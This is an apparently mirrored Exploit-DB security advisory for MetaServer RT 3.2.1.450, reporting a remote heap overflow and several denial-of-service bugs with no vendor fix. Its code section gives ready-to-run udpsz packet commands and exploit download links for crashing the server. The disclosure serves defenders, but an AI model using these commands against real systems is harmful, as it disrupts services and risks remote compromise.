MetaServer RT 3.2.1.450 – Multiple Vulnerabilities

• Exploit Database
• 9 阅读

• 作者： Luigi Auriemma
  日期： 2011-09-21
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17879/

• #######################################################################
  
   Luigi Auriemma
  
  Application:MetaServer RT
  http://www.traderssoft.com/ts/msrt/
  Versions: <= 3.2.1.450
  Platforms:Windows
  Bugs: A] heap overflow
  B] various Denials of Service
  Exploitation: remote
  Date: 19 Sep 2011
  Author: Luigi Auriemma
  e-mail: aluigi@autistici.org
  web:aluigi.org
  
  
  #######################################################################
  
  
  1) Introduction
  2) Bugs
  3) The Code
  4) Fix
  
  
  #######################################################################
  
  ===============
  1) Introduction
  ===============
  
  
  From vendor's website:
  "MetaServer RT allows to use MetaStock 6.52/7.x/8.x/9.x/10.x/11.x
  (eSignal version) and TradeStartion2000i/ProSuite2000i with datafeeds
  that are not supported originally."
  
  
  #######################################################################
  
  =======
  2) Bugs
  =======
  
  
  The program listens on ports 2189, 2192 and 2194.
  
  ----------------
  A] heap overflow
  ----------------
  
  Through an interrupted connection with multiple packets on port 2189
  and a subsequent reconnection it's possible to cause a heap overflow
  and the relative write4.
  Both the "MESSA" and "ROSCO" commands can be used.
  
  
  -----------------------------
  B] various Denials of Service
  -----------------------------
  
  Various invalid memory accesses and freezing of the program.
  
  
  #######################################################################
  
  ===========
  3) The Code
  ===========
  
  
  http://aluigi.org/testz/udpsz.zip
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17879.zip
  
  A]
   udpsz -C "cdab0000 00000000 ffff0000 00000000 ffffffff 524f53434f" -l 0 -T -1 SERVER 2189 0xffff
  
   stop after at least 50 dots and relaunch the command again till the
   crashing of the server during a memcpy.
  
  
  B]
  udpsz -b 0x80 -T SERVER 2194 1000
  udpsz -C "cdab0000 00000000 00ffffff 00000000 00000000 524f53434f" -T SERVER 2189 -1
  ...others...
  
  
  #######################################################################
  
  ======
  4) Fix
  ======
  
  
  No fix.
  
  
  #######################################################################